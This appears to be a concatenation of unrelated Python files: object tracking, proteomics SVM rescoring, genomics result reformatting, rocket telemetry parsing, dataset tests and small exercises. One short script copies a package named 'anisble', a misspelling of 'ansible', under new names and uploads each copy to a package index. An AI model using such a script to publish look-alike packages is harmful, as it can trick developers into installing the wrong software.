cached_bounding_boxes_list = []
bounding_boxes_list.sort(key=lambda bb: bb.center[1], reverse=True)
if seq_id > last_frame:
break
for bounding_box in bounding_boxes_list:
bounding_box = BoundingBoxChain(bounding_box, seq_id, hour, minute, second)
bounding_box.lane_id = detect_position(bounding_box, valid_mask, distance_mask, lane_masks_list)
linked_bounding_box = link_bounding_box(bounding_box, open_bounding_boxes_list)
if linked_bounding_box:
add_bounding_box(bounding_box, linked_bounding_box, cached_bounding_boxes_list, open_bounding_boxes_list, closed_bounding_boxes_list)
elif bounding_box.lane_id > 0:
cached_bounding_boxes_list.append(bounding_box)
open_bounding_boxes_list.extend(cached_bounding_boxes_list)
clean(seq_id, open_bounding_boxes_list, closed_bounding_boxes_list)
closed_bounding_boxes_list.extend(open_bounding_boxes_list)
save_tracks(direction, closed_bounding_boxes_list)
# show_brief(closed_bounding_boxes_list)
# show_detail(closed_bounding_boxes_list)
export_tracks(direction, closed_bounding_boxes_list)
def detect_tracks(op: str) -> None:
_, direction, last_frame = op.split('-')
detect_single_direction_tracks(direction, last_frame)
if __name__ == '__main__':
# detect_tracks("tracks-north-00100")
# detect_tracks("tracks-south-00100")
# detect_tracks("tracks-west-00100")
# detect_tracks("tracks-east-00100")
detect_tracks("tracks-north-99999")
detect_tracks("tracks-south-99999")
detect_tracks("tracks-west-99999")
detect_tracks("tracks-east-99999")
|
24,138 | cc6bb812069a194a30960c12b3c431d7565c1fb1 | #Exercise this fikle is to illustarte how to use (block) comments
#print ('this is a test')
#on the day of 2/22/2017, found a bug JIRA 7862
#HJ
print ('this is not a test')
#not recommand
...
1
1
1
1
1
1
...
|
24,139 | f6a504e608e529e9735c5ff192ea95712e778de8 | print()
print(ord('M'))
print(ord('m'))
print(ord('t'))
print(ord('4')) |
24,140 | b6c127c0334c1bc52e0c0b33ce1c442c6710f88a | ###############################################################################
## Function:
## This file reads in original BOOST result file InteractionRecords.txt
## and the plink map file ESRD2_..._Ch1-22.map
## and generates the reformated BOOST results: results_ESRD2_BOOST.txt
################################################################################
from itertools import islice
from scipy.stats import chi2
ori_file = open(r"MIGen_InteractionRecords.txt",mode = 'r')
result_file = open(r"results_MIGen_BOOST.txt", mode = 'w+')
ori_file_map = open(r"MIGen_QC.map", mode = 'r')
index = 0
SNPs = []
BPs = []
CHRs = []
for line in ori_file_map:
statistics = line.split()
CHRs.append(statistics[0])
SNPs.append(statistics[1])
BPs.append(statistics[3])
# The indices of SNPs in the three (first, last, remain) result files start from 0
all_list = []
while True:
next_n_lines = list(islice(ori_file,20))
if not next_n_lines:
break
res_n_lines=[]
for line in next_n_lines:
if len(line)==0:
continue
sample = line.split()
# IND1 IND2 InteractionBOOST, SNP1, SNP2, BP1, BP2, InteractionPVal, CHR1, CHR2
# For GBOOST results: use float(sample[5])
# For GBOOST2 results: use float(sample[3])
chi4GBOOST = sample[5]
pGBOOST = 1 - chi2.cdf(float(chi4GBOOST), 4)
all_list.append([sample[1], sample[2], chi4GBOOST,
SNPs[int(sample[1])], SNPs[int(sample[2])],
BPs[int(sample[1])], BPs[int(sample[2])], str(pGBOOST), CHRs[int(sample[1])], CHRs[int(sample[2])]])
all_list_sorted = sorted(all_list, key=lambda tup: tup[2], reverse = True)
for ele in all_list_sorted:
result_file.write(' '.join(ele)+'\n')
ori_file.close()
ori_file_map.close()
result_file.close()
|
24,141 | b02560bd852d3cc471ec5aa5f9da60283f5e7fbc | #!/usr/bin/env python
import sys
import os
import subprocess
clone_to = sys.argv[1]
cwd = os.getcwd()
os.mkdir('../%s' % (clone_to,))
os.mkdir('../%s/%s' % (clone_to, clone_to))
for fn in ['setup.py', 'README', 'anisble/__init__.py']:
ofs = open('../%s/%s' % (clone_to, fn.replace('anisble', clone_to)), 'w')
ofs.write(open(fn).read().replace('anisble', clone_to))
ofs.close()
os.chdir('../%s' % (clone_to,))
try:
subprocess.check_call(['python', 'setup.py', 'sdist', 'upload'])
finally:
os.chdir(cwd)
|
24,142 | 4379abd437cd16311ea6b208ffee639139486bb6 | import struct
from dataclasses import dataclass
from math import pow
@dataclass
class RocketData:
start : bytes = b'\xff\xff'
timestamp : int = 0
Hts_temperature : float = 0 #celsius
Lps_pressure : float = 0 # kiloPascals
Imu_accelX : float = 0
Imu_accelY : float = 0
Imu_accelZ : float = 0
Imu_gyroX : float = 0
Imu_gyroY : float = 0
Imu_gyroZ : float = 0
Imu_magX : float = 0
Imu_magY : float = 0
Imu_magZ : float = 0
Gps_lat : float = 0
Gps_lng : float = 0
Gps_altitude : float = 0
end : bytes = b'\xA4\x55'
DATA_LEN = 64
class SerialParser:
def __init__(self, data):
self.data = data
self.data_queue = []
self.numpackages = 0
self.loss = 0
def findPackage(self, stream):
'''
reads the serial data and picks out packages
feeds into unpackData
'''
packages = stream.hex().split('ffff')
for package in packages:
if package:
self.numpackages += 1
package = 'ffff' + package
if len(package) != DATA_LEN * 2:
self.loss += 1
continue
unpacked = self.unpackData(bytes.fromhex(package))
self.updateData(unpacked)
def unpackData(self, package):
'''
takes in package (wihthout start and end bytes)
returns unpacked data as a tuple
format <fffffffffffffI
'''
unpacked = struct.unpack("<2sIffffffffffffff2s", package)
return unpacked
def updateData(self, update):
'''
updates RocketData after newly unpacked data is available
'''
import recordCsv
data = RocketData(*update)
self.data = data
recordCsv.convertPackage(data)
# thought a queue could be helpful maybe, at least for debugging it is
self.data_queue.append(data)
if len(self.data_queue) > 50:
self.data_queue.pop(0)
# real data package:
_real = '\xff\xfff\x90\xe1AjJ\xc9B\x00@\x0e>\x00\x00\x06\xbd\x00\x80z?\x00\x80;\xbe\x00\xa0\x0c?\x00\x00z=\x00@N@\x00T\xd3A\x80\xd0\x06B\x00\x00\x00\x00\x00\x00\x00\x00\x87u\x14\x00\xa4U'
# a fake but easy to test with one:
_package = b'\x31\x99\xc3\x41\xca\x15\xc8\x42\x00\x00\x03\x3d\x00\x00\x84\xbd\x00\x08\x7d\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x7a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x18\xe3\xec\xc2\x00\x00\x00\x00'
_raw = b'\x12\x00\xa1\x7e\xff\xff\x31\x99\xc3\x41\xca\x15\xff\xff\xc8\x42\x00\x00\x03\x3d\x00\x00\x84\xbd\x00\x08\x7d\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x7a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x18\xe3\xec\xc2\x00\x00\x00\x00\xa4\x55'\
b'\xff\xff\x31\x98\xc2\x41\xca\x15\xc8\x42\x00\x00\x03\x3e\x00\x00\x84\xbd\x00\x08\x75\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x9a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x23\xe3\xec\xc2\xc2\xed\x1e\x10\x00\x00\x00\x00\xa4\x55'
|
24,143 | 2cd297229f08d32848bf857a2561e0174ba5f743 | from .utils import encode_attr
from .control import Control
class Toggle(Control):
def __init__(self, label=None, id=None, value=None, inline=None,
on_text=None, off_text=None, data=None, onchange=None,
width=None, height=None, padding=None, margin=None,
visible=None, disabled=None):
Control.__init__(self, id=id,
width=width, height=height, padding=padding, margin=margin,
visible=visible, disabled=disabled)
self.value = value
self.label = label
self.inline = inline
self.on_text = on_text
self.off_text = off_text
self.data = data
self.onchange = onchange
def _getControlName(self):
return "toggle"
# onchange
@property
def onchange(self):
return None
@onchange.setter
def onchange(self, handler):
self._add_event_handler("change", handler)
# value
@property
def value(self):
return self._get_attr("value")
@value.setter
def value(self, value):
assert value == None or isinstance(value, bool), "value must be a boolean"
self._set_attr("value", value)
# label
@property
def label(self):
return self._get_attr("label")
@label.setter
def label(self, value):
self._set_attr("label", value)
# inline
@property
def inline(self):
return self._get_attr("inline")
@inline.setter
def inline(self, value):
assert value == None or isinstance(value, bool), "value must be a boolean"
self._set_attr("inline", value)
# on_text
@property
def on_text(self):
return self._get_attr("onText")
@on_text.setter
def on_text(self, value):
self._set_attr("onText", value)
# off_text
@property
def off_text(self):
return self._get_attr("offText")
@off_text.setter
def off_text(self, value):
self._set_attr("offText", value)
# data
@property
def data(self):
return self._get_attr("data")
@data.setter
def data(self, value):
self._set_attr("data", value)
|
24,144 | 674665dc9c650aad22f00bf6d29df0b871bc00d6 | import torch
import pytest
from binding_prediction.dataset import (
DrugProteinDataset, PosDrugProteinDataset,
collate_fn, _load_datafile)
from binding_prediction.utils import get_data_path
class TestDataUtils(object):
def test_load(self):
fname = get_data_path('example.txt')
smiles, prots = _load_datafile(fname)
assert(smiles[0] == 'CC(=O)OC(CC(=O)[O-])C[N+](C)(C)C')
exp = ('MVLAWPDRYSSVQLELPEGATVAEAVATSGLALQQAPAAHAVHGLVARPEQ'
'VLRDGDRVELLRPLLLDPKEARRRRAGPSKKAGHNS')
assert(prots[1] == exp)
class TestDrugProteinDataset(object):
@pytest.mark.parametrize('precompute', [True, False])
@pytest.mark.parametrize('multiple_bond_types', [True, False])
def test_output_shapes(self, precompute, multiple_bond_types):
dset = DrugProteinDataset("data/example.txt", precompute=precompute,
multiple_bond_types=multiple_bond_types)
first_element = dset[0]
assert(first_element['node_features'].shape[0] == 14)
assert(first_element['adj_mat'].shape[0] == 14)
assert(first_element['adj_mat'].shape[1] == 14)
assert(first_element['is_true'])
if multiple_bond_types:
assert(len(first_element['adj_mat'].shape) == 3)
else:
assert(len(first_element['adj_mat'].shape) == 2)
@pytest.mark.parametrize('precompute', [True, False])
def test_sampling(self, precompute):
def fake_dist():
return 1, 2
rand_dset = DrugProteinDataset("data/example.txt", precompute=True,
prob_fake=1., fake_dist=fake_dist)
ref_dset = DrugProteinDataset("data/example.txt", precompute=True,
prob_fake=0.)
fake_element = rand_dset[0]
true_element_1 = ref_dset[1]
true_element_3 = ref_dset[2]
assert(torch.norm(fake_element['node_features'] - true_element_1['node_features']) < 1e-6)
assert(torch.norm(fake_element['adj_mat'] - true_element_1['adj_mat']) < 1e-6)
assert(fake_element['protein'] == true_element_3['protein'])
assert(fake_element['is_true'] == 0)
class TestPosDrugProteinDataset(object):
def test_getitem(self):
datafile = get_data_path('sample_dataset2.txt')
db = PosDrugProteinDataset(datafile=datafile, num_neg=2)
res = db[0]
exp_seq = ('MDVLLANPRGFCAGVDRAIEIVKRAIETLGAPIYVRHEVVHNRFVV'
'DDLKQRGAIFVEELDEVPDDATVIFSAHGVSQAVRQEAERRGLKVF'
'DATCPLVTKVHFEVARHCRAGRDVVLIGHAGHPEVEGTMGQWSRER'
'GAGTIYLVEDIEQVATLDVRQPDNLAYTTQTTLSVDDTMGIIEALR'
'ARYPAMQGPRHDDICYATQNRQDAVRDLARQCDLVLVVGSPNSSNS'
'NRLSELARRDGVESYLIDNASEIDPAWIVGKQHIGLTAGASAPQVL'
'VDGVLERLRELGAAGVSELEGEPESMVFALPKELRLRLVS')
assert(res['protein'] == exp_seq)
def test_collate_fxn():
node_features = [torch.randn(13, 4), torch.randn(8, 4), torch.randn(15, 4)]
protein = [torch.randn(40, 2), torch.randn(15, 2), torch.randn(30, 2)]
adj_mat = [torch.randint(2, (13, 13)).float(), torch.randint(2, (8, 8)).float(),
torch.randint(2, (15, 15)).float()]
is_true = [1, 1, 0]
input_batches = []
for n_i, p_i, a_i, t_i in zip(node_features, protein, adj_mat, is_true):
sample_i = {'node_features': n_i, 'protein': p_i, 'adj_mat': a_i, 'is_true': t_i}
input_batches.append(sample_i)
collated_batch = collate_fn(input_batches)
assert(collated_batch['node_features'].shape == (3, 15, 4))
assert(collated_batch['protein'].shape == (3, 40, 2))
assert(torch.norm(collated_batch['is_true'] - torch.tensor([1., 1., 0.])) < 1e-6)
for i, (n_i, p_i, a_i) in enumerate(zip(node_features, protein, adj_mat)):
drug_size, drug_channels = n_i.shape
prot_size, prot_channels = p_i.shape
batched_n_i = collated_batch['node_features'][i][:drug_size, :drug_channels]
assert(torch.norm(batched_n_i - n_i) < 1e-4)
batched_p_i = collated_batch['protein'][i][:prot_size, :prot_channels]
assert(torch.norm(batched_p_i - p_i) < 1e-4)
batched_a_i = collated_batch['adj_mat'][i][:drug_size, :drug_size]
assert(torch.norm(batched_a_i - a_i) < 1e-4)
|
24,145 | a4967cd76294460baa6ea2331bb0c2101984ff44 | from googletrans import Translator as GoogleTrans
from datamuse import datamuse
translator = GoogleTrans()
similar_finder = datamuse.Datamuse()
def get_translation(word, src, dest='en'):
if src:
res = translator.translate(word, src=src, dest=dest)
else:
res = translator.translate(word, dest=dest)
translation = {}
translation['target'] = word
translation['result'] = res.text
translation['from_google'] = []
translation['extra_similarity'] = []
if res.extra_data['all-translations']:
for item in res.extra_data['all-translations']:
translation['from_google'].append((item[0], [i[:2]+i[3:] for i in item[2]]))
if len(translation['from_google']) <= 1:
text = res.text
# datamuse only support english similar words right now
if dest == 'en':
similars = similar_finder.words(ml=text, max=4)
for item in similars:
translation['extra_similarity'].append([item['word'],
[i for i in item.get("tags", []) if i != 'syn'],
item['score']])
print(translation)
return translation
if __name__ == "__main__":
word = '相似'
translation = get_translation(word)
print(translation)
|
24,146 | c053544c25841d0cec0beef1f6cb74fd5c145362 |
##参数化多态性
# map
"""
编译器编写者必须彻底地研究元语言的类型系统
"""
##一些问题
"""
1. 动态类型语言的运算符重载是如何实现的?
请描述一种方法,对scheme中形如 (+ a b)的操作进行类型检查的?
2. 变量的类型是否可变?
3. 面向对象语言中,子类对象可以赋给父类型变量,设计一种机制,使用特设
语法制导转换来判断此类赋值是否是允许的?
"""
|
24,147 | 133b99e346fac81dabd9a759c97b5f2357544416 | n = int(input())
i=2
while n % i != 0:
i+=1
print(i)
|
24,148 | 215c54ae08333c6e6b44cf0ee710c93111f54c7a | #!/usr/bin/env python
"""
usage:
svm.py unified_input.csv engine_score_column_name
i.e. :
svm.py omssa_2_1_6_unified.csv 'OMSSA:pvalue'
Writes a new file with added column "SVMscore" which is the distance to
the separating hyperplane of a Percolator-like support vector machine.
"""
import numpy as np
import sklearn
from sklearn import svm
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import Imputer
from collections import Counter, defaultdict
from random import random
import csv
import re
import os
import argparse
from misc import (
get_score_colname_and_order,
field_to_float,
unify_sequence,
calc_FDR,
scale_scores,
row_is_decoy,
field_to_bayes_float,
get_mz_values,
)
SCALER = (
sklearn.preprocessing.RobustScaler()
) # RobustScaler() seems to be most robust ;)
PROTON = 1.00727646677
class SVMWrapper(dict):
def __init__(self):
self._svm_score_name = "SVMscore"
self.counter = { # counting the # of possible training PSMs
"target": 0,
"decoy": 0,
"positive": 0,
"negative": 0,
"unknown": 0,
"parsed PSMs": 0,
}
self.results = {}
self.shitty_decoy_seqs = set() # is overwritten by find_shitty_decoys()
self.mgf_lookup = {}
self.pep_to_mz = {}
if __name__ == "__main__":
self.parse_options() # parse command line args and set options
self.set_input_csv()
self.observed_charges = set()
self.used_extra_fields = set()
self.decoy_train_prob = (
None # probability to include decoy PSMs as negative training examples
)
self.maximum_proteins_per_line = 0
self.tryptic_aas = set(["R", "K", "-"])
self.delim_regex = re.compile(
r"<\|>|\;"
) # regex to split a line by both ";" and "<|>"
return
def parse_options(self):
"""
parses the command line args for options/parameters
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input_csv",
type=str,
help="Input CSV path(s)",
required=True,
nargs="+",
)
parser.add_argument(
"-o", "--output_csv", type=str, help="Output CSV path", required=True
)
parser.add_argument(
"-k",
"--kernel",
type=str,
default="rbf",
help='SVM kernel type ("rbf", "linear", "poly" or "sigmoid")',
)
parser.add_argument(
"-c", type=float, default=1.0, help="Penalty parameter C of the error term"
)
parser.add_argument(
"-g",
"--gamma",
type=str,
default="auto",
help="Gamma parameter of the SVM.",
)
parser.add_argument(
"-r",
"--mb_ram",
type=float,
default=4000,
help="Available RAM in megabytes, for SVM calculation",
)
parser.add_argument(
"-f",
"--fdr_cutoff",
type=float,
default=0.01,
help="Target PSMs with a lower FDR will be used as a "
"positive training set",
)
parser.add_argument(
"-x",
"--columns_as_features",
type=str,
nargs="+",
default=[
"MS-GF:RawScore",
"MS-GF:DeNovoScore",
"MS-GF:SpecEValue",
"MS-GF:EValue",
"OMSSA:evalue",
"OMSSA:pvalue",
"X\!Tandem:expect",
"X\!Tandem:hyperscore",
],
help="Columns that should be used as a feature directly "
"(e.g. secondary scores). Will be converted to float",
)
parser.add_argument(
"-d",
"--dump_svm_matrix",
type=str,
default=False,
help="Dump SVM matrix in PIN (Percolator input) format "
"to the specified path, mostly for debugging "
"and benchmarking.",
)
arg_dict = vars(parser.parse_args()) # convert to dict
self.update(arg_dict)
try:
self["gamma"] = float(self["gamma"])
except ValueError:
assert (
self["gamma"] == "auto"
), "Invalid gamma param: " '"{0}", using "auto" instead.'.format(
self["gamma"]
)
def set_input_csv(self):
"""
distinguishes one vs. many unified input csv files and either
sets the single csv as input, or merges all csvs and sets
the merged csv as input.
"""
if len(self["input_csv"]) > 1:
raise Exception("You must only specify *one* unified CSV file!")
self.csv_path = self["input_csv"][0]
print("Using input file", self.csv_path)
def find_shitty_decoys(self):
"""
Finds and notes decoys that share their sequence with a target PSM.
Also counts the number of targets and decoys to get a quick estimate
of how many positive/negative training examples can be "claimed".
"""
target_seqs = set()
decoy_seqs = set()
with open(self.csv_path, "r") as f:
reader = csv.DictReader(f)
sorted_reader = sorted(
reader,
reverse=self["bigger_scores_better"],
key=lambda d: float(d[self.col_for_sorting]),
)
for row in sorted_reader:
self.observed_charges.add(int(row["Charge"]))
if row_is_decoy(row):
decoy_seqs.add(unify_sequence(row["Sequence"]))
self.counter["decoy"] += 1
else:
target_seqs.add(unify_sequence(row["Sequence"]))
self.counter["target"] += 1
self.shitty_decoy_seqs = target_seqs.intersection(decoy_seqs)
if len(self.shitty_decoy_seqs) > 0:
print(
"Warning! Found {0} sequences that are target AND decoy "
"(immutable peptides?). These will not be used for training.\n".format(
len(self.shitty_decoy_seqs)
)
)
return
def determine_csv_sorting(self):
with open(self.csv_path, "r") as in_file:
reader = csv.DictReader(in_file)
(
self.col_for_sorting,
self["bigger_scores_better"],
) = get_score_colname_and_order(reader.fieldnames)
if self.col_for_sorting == self._svm_score_name:
self._svm_score_name = self._svm_score_name + "2"
print(
"CSV will be sorted by column {0} (reverse={1}"
")".format(self.col_for_sorting, self["bigger_scores_better"])
)
for feat in self["columns_as_features"]:
if feat in reader.fieldnames and feat != self.col_for_sorting:
self.used_extra_fields.add(feat)
def sort_by_rank(self, rowdict):
score = float(rowdict[self.col_for_sorting])
spec_title = rowdict["Spectrum Title"]
return (spec_title, score)
@staticmethod
def parse_protein_ids(csv_field, sep="<|>"):
"""
Turns the unified CSV column "Protein ID"
into a set of all protein IDs.
"""
clean = csv_field.replace("decoy_", "").strip()
prot_id_set = set(clean.split(sep))
return prot_id_set
def count_intra_set_features(self):
"""
intra-set features as calculated by Percolator:
- num_pep: Number of PSMs for which this is the best scoring peptide.
- num_prot: Number of times the matched protein matches other PSMs.
- pep_site: Number of different peptides that match this protein.
own ideas:
- pep_charge_states: in how many charge states was the peptide found?
- seq_mods: in how many mod states was the AA-sequence found?
- num_spec: Number of times the matched spectrum matches other peptides.
"""
print("Counting intra-set features...")
self.num_pep = defaultdict(int)
self.num_prot = defaultdict(set)
self.pep_site = defaultdict(set)
self.score_list_dict = defaultdict(list)
self.pep_charge_states = defaultdict(set)
self.seq_mods = defaultdict(set)
self.num_spec = defaultdict(set)
with open(self.csv_path, "r") as f:
reader = csv.DictReader(f)
previous_spec_title = None
rows_of_spectrum = []
for row in sorted(
reader, reverse=self["bigger_scores_better"], key=self.sort_by_rank
):
if unify_sequence(row["Sequence"]) in self.shitty_decoy_seqs:
continue
current_spec_title = row["Spectrum Title"]
if current_spec_title != previous_spec_title:
# the next spectrum started, so let's process the info we
# collected for the previous spectrum:
score_list = [
field_to_bayes_float(r[self.col_for_sorting])
for r in rows_of_spectrum
]
self.score_list_dict[previous_spec_title] = score_list
for rank, line in enumerate(rows_of_spectrum):
# print("\t".join([
# str(rank), line['Spectrum Title'], line[self.col_for_sorting]
# ]))
uni_sequence = unify_sequence(line["Sequence"])
peptide = (uni_sequence, line["Modifications"])
# multiple proteins are separated by <|>
# ignore start_stop_pre_post part since it depends on the peptide
# and not the protein (i.e. _233_243_A_R)
proteins = set(
line["Protein ID"].replace("decoy_", "").split(";")
)
# old unify csv format:
# proteins = self.parse_protein_ids(
# line['proteinacc_start_stop_pre_post_;']
# )
if len(proteins) > self.maximum_proteins_per_line:
self.maximum_proteins_per_line = len(proteins)
if rank == 0:
# this is the 'best' peptide for that spectrum
self.num_pep[peptide] += 1
for protein in proteins:
self.num_prot[protein].add(
(
line["Spectrum Title"],
uni_sequence,
line["Modifications"],
)
)
self.pep_site[protein].add(peptide)
self.pep_charge_states[peptide].add(int(row["Charge"]))
self.seq_mods[uni_sequence].add(row["Modifications"])
self.num_spec[line["Spectrum Title"]].add(peptide)
rows_of_spectrum = []
rows_of_spectrum.append(row)
previous_spec_title = current_spec_title
def row_to_features(self, row):
"""
Converts a unified CSV row to a SVM feature matrix (numbers only!)
"""
sequence = unify_sequence(row["Sequence"])
charge = field_to_float(row["Charge"])
score = field_to_bayes_float(row[self.col_for_sorting])
calc_mz, exp_mz, calc_mass, exp_mass = get_mz_values(row)
# calc_mz = field_to_float( row['Calc m/z'] ) # calc m/z or uCalc?
# exp_mz = field_to_float( row['Exp m/z'] )
pre_aa_field = row["Sequence Pre AA"]
post_aa_field = row["Sequence Post AA"]
all_pre_aas = set(re.split(self.delim_regex, pre_aa_field))
all_post_aas = set(re.split(self.delim_regex, post_aa_field))
if any(pre_aa not in self.tryptic_aas for pre_aa in all_pre_aas):
enzN = 0
else:
enzN = 1
if any(post_aa not in self.tryptic_aas for post_aa in all_post_aas):
enzC = 0
else:
enzC = 1
n_missed_cleavages = len(
[aa for aa in sequence[:-1] if aa in ["R", "K"]]
) # / len(sequence)
missed_cleavages = [0] * 6
try:
missed_cleavages[n_missed_cleavages] = 1
except IndexError: # if a peptide has more than 6 missed cleavages
missed_cleavages[-1] = 2
spectrum = row["Spectrum Title"].strip()
mass = (exp_mz * charge) - (charge - 1) * PROTON
pep_len = len(sequence)
# delta_mz = calc_mz - exp_mz
delta_mass = calc_mass - exp_mass
peptide = (sequence, row["Modifications"])
proteins = self.parse_protein_ids(row["Protein ID"])
num_pep = self.num_pep[peptide]
pep_charge_states = len(self.pep_charge_states[peptide])
seq_mods = len(self.seq_mods[sequence])
num_spec = len(self.num_spec[row["Spectrum Title"]])
num_prot = sum((len(self.num_prot[protein]) for protein in proteins))
pep_site = sum((len(self.pep_site[protein]) for protein in proteins))
user_specified_features = []
for feat in self.used_extra_fields:
if feat != self.col_for_sorting:
try:
user_specified_features.append(field_to_float(row[feat]))
except ValueError:
pass
charges = defaultdict(int)
for charge_n in sorted(self.pep_charge_states[peptide]):
charges[charge_n] = 1
if sequence in self.shitty_decoy_seqs:
is_shitty = 1
else:
is_shitty = 0
score_list = sorted(
list(set(self.score_list_dict[spectrum])),
reverse=self["bigger_scores_better"],
)
try:
score_list_scaled = scale_scores(score_list)
rank = score_list.index(score)
deltLCn = (
score_list_scaled[rank] - score_list_scaled[1]
) # Fractional difference between current and second best XCorr
deltCn = (
score_list_scaled[rank] - score_list_scaled[-1]
) # Fractional difference between current and worst XCorr
except (ValueError, IndexError, AssertionError):
# NaN values will be replaced by the column mean later
# NaN values are entered when there is no ranking
# e.g. when only one peptide was matched to the spectrum.
rank, deltLCn, deltCn = np.nan, np.nan, np.nan
features = [
score,
rank,
deltCn,
deltLCn,
charge,
# delta_mz,# / pep_len,
delta_mass, # / pep_len,
# abs(delta_mz),# / pep_len,
abs(delta_mass), # / pep_len,
n_missed_cleavages / pep_len,
missed_cleavages[0],
missed_cleavages[1],
missed_cleavages[2],
missed_cleavages[3],
missed_cleavages[4],
missed_cleavages[5],
enzN,
enzC,
mass,
pep_len,
num_pep,
num_prot,
pep_site,
is_shitty,
pep_charge_states,
num_spec,
seq_mods,
]
for charge_n in self.observed_charges:
features.append(charges[charge_n])
return features + user_specified_features
def collect_data(self):
"""
parses a unified csv file and collects features from each row
"""
categories = []
list_of_feature_lists = []
feature_sets = set()
with open(self.csv_path, "r") as f:
reader = csv.DictReader(f)
# collecting some stats for FDR calculation:
self.PSM_count = 0
self.decoy_count = 0
if self["dump_svm_matrix"]:
self.init_svm_matrix_dump()
additional_matrix_info = []
for i, row in enumerate(
sorted(
reader,
reverse=self["bigger_scores_better"],
key=lambda d: float(d[self.col_for_sorting]),
)
):
features = self.row_to_features(row)
if tuple(features) in feature_sets:
continue
feature_sets.add(tuple(features))
category, psm_FDR = self.get_psm_category(row)
list_of_feature_lists.append(features)
categories.append(category)
if self["dump_svm_matrix"]:
label = -1 if row_is_decoy(row) else 1
sequence = "{0}.{1}#{2}.{3}".format(
row["Sequence Pre AA"].strip(),
row["Sequence"].strip(),
row["Modifications"].strip(),
row["Sequence Post AA"].strip(),
)
additional_matrix_info.append(
{
"psm_id": row["Spectrum Title"].strip(),
"label": label,
"scannr": row["Spectrum Title"].strip().split(".")[-2],
"peptide": sequence,
"proteins": self.parse_protein_ids(row["Protein ID"]),
}
)
if i % 1000 == 0:
score_val = float(row[self.col_for_sorting])
msg = (
"Generating feature matrix from input csv "
"(line ~{0}) with score {1} and FDR "
"{2}".format(i, score_val, psm_FDR)
)
print(msg, end="\r")
# All data points are collected in one big matrix, to make standardization possible
print("\nConverting feature matrix to NumPy array...")
X_raw = np.array(list_of_feature_lists, dtype=float)
print("Replacing empty/NaN values with the mean of each column...")
self.nan_replacer = Imputer()
self.nan_replacer.fit(X_raw)
X_raw = self.nan_replacer.transform(X_raw)
# Standardize input matrix to ease machine learning! Scaled data has zero mean and unit variance
print("Standardizing input matrix...")
self.scaler = SCALER.fit(X_raw)
self.X = self.scaler.transform(X_raw)
self.categories = np.array(categories)
print()
if self["dump_svm_matrix"]:
print("Dumping SVM matrix to", self["dump_svm_matrix"])
for i, matrix_row in enumerate(self.X):
matrix_row_info = additional_matrix_info[i]
self.dump_svm_matrix_row(
row=list(matrix_row),
psm_id=matrix_row_info["psm_id"],
label=matrix_row_info["label"],
scannr=matrix_row_info["scannr"],
peptide=matrix_row_info["peptide"],
proteins=matrix_row_info["proteins"],
)
print("Dumped SVM matrix to", self["dump_svm_matrix"])
return
def init_svm_matrix_dump(self):
from misc import FEATURE_NAMES
colnames = ["PSMId", "label", "scannr"] + FEATURE_NAMES
colnames += ["charge{0}".format(c) for c in self.observed_charges]
for extra_field in sorted(self.used_extra_fields):
colnames += [extra_field]
colnames += ["peptide"]
for n_proteins in range(self.maximum_proteins_per_line):
colnames.append("proteinId{0}".format(n_proteins + 1))
self.matrix_csv_path = self["dump_svm_matrix"]
print("Dumping raw SVM input matrix to", self.matrix_csv_path)
with open(self.matrix_csv_path, "w") as f:
f.write("\t".join(colnames) + "\n")
def dump_svm_matrix_row(
self,
row=None,
psm_id=None,
label=None,
scannr=None,
peptide=None,
proteins=None,
):
full_row = [psm_id, label, scannr] + row + [peptide] + list(proteins)
with open(self.matrix_csv_path, "a") as f:
row_str = "\t".join(str(x) for x in full_row) + "\n"
f.write(row_str)
def get_psm_category(self, row):
"""
Determines whether a PSM (csv row) should be used as a negative or
positive training example.
returns
1 - high-scoring target (positive training example)
0 - not-high-scoring target (not usable for training)
-1 - decoy (negative training example)
"""
category = 0 # unknown (mix of true positives and false positives)
self.PSM_count += 1 # for FDR calculation
sequence = unify_sequence(row["Sequence"])
psm_FDR = calc_FDR(self.PSM_count, self.decoy_count)
if row_is_decoy(row):
self.decoy_count += 1
if psm_FDR <= 0.25 and sequence not in self.shitty_decoy_seqs:
category = -1 # decoy (false positive hits)
self.counter["negative"] += 1
else:
if not self.decoy_train_prob:
need_max = self.counter["positive"] * 2
have = self.counter["negative"]
still_there = self.counter["decoy"] - have
prob = need_max / still_there
if prob < 0.001:
prob = 0.001
self.decoy_train_prob = prob
print()
print(self.counter)
print("need max:", need_max)
print("have:", have)
print("still_there:", still_there)
print("probability:", self.decoy_train_prob)
print()
if self.decoy_train_prob >= 1.0 or random() <= self.decoy_train_prob:
category = -1 # decoy (false positive hits)
self.counter["negative"] += 1
else: # row is target
if psm_FDR <= self["fdr_cutoff"] and sequence not in self.shitty_decoy_seqs:
category = 1 # high quality target (almost certainly true positives)
self.counter["positive"] += 1
if category == 0:
self.counter["unknown"] += 1
return (category, psm_FDR)
def train(self, training_matrix, training_categories):
counter = Counter(training_categories)
msg = "Training {0} SVM on {1} target PSMs and {2} decoy PSMs" "...".format(
self["kernel"], counter[1], counter[-1]
)
print(msg, end="\r")
# specify the classification method (rbf and linear SVC seem to work best and are quite fast)
classifier = svm.SVC(
C=self["c"],
kernel=self["kernel"],
probability=False, # we don't want to get probabilities later on -> faster
cache_size=self["mb_ram"], # available RAM in megabytes
# decision_function_shape = 'ovr', # doesn't seem to matter
# class_weight= 'balanced', # doesn't seem to matter
)
# train the SVC on our set of training data:
classifier.fit(
training_matrix,
training_categories,
)
print(msg + " done!")
return classifier
def classify(self, classifier, psm_matrix):
msg = "Classifying {0} PSMs...".format(len(psm_matrix))
print(msg, end="\r")
for i, row in enumerate(psm_matrix):
# get the distance to the separating SVM hyperplane and use it as a score:
svm_score = classifier.decision_function(np.array([row]))[0]
features = tuple(row)
if features not in self.results:
self.results[features] = svm_score
else:
print(
"Warning! This combination of features already has a predicted probability! "
"Previous svm_score: {0:f} - Current svm_score: {1:f}"
"".format(self.results[tuple(row)], svm_score)
)
